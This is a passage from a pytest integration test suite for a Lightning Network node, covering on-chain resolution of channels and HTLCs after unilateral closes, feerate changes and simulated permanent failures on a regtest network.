# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@pytest.mark.skip("Lisa, please fix this!")
@pytest.mark.developer("needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None,
'plugin': coin_mvt_plugin},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects, options={'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for unilateral_close set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None), ('cid1', ['htlc_timeout'], ['ignored'], 'C')],
'C': [('wallet', ['deposit'], None, None)],
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)],
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l2.daemon.wait_for_log('htlc 0: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 11000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l2.daemon.wait_for_log('htlc 1: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l2.daemon.wait_for_log('htlc 2: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore and HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
inv = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)
h = inv['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# After at depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects,
feerates=(7500, 7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('Handed peer, entering loop')
l2.fundchannel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:.*\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Check that the all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = scriptpubkey_addr(txout['scriptPubKey'])
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@pytest.mark.developer("needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not node_factory.valgrind:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
@flaky
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
# There's a workaround in channeld, that it treats incoming errors
# before both sides are locked in as warnings; this happens in
# this test, so l1 reports the error as a warning!
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
# This will block, as l12 will send an error but l2 will retry.
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
fut.result(TIMEOUT)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
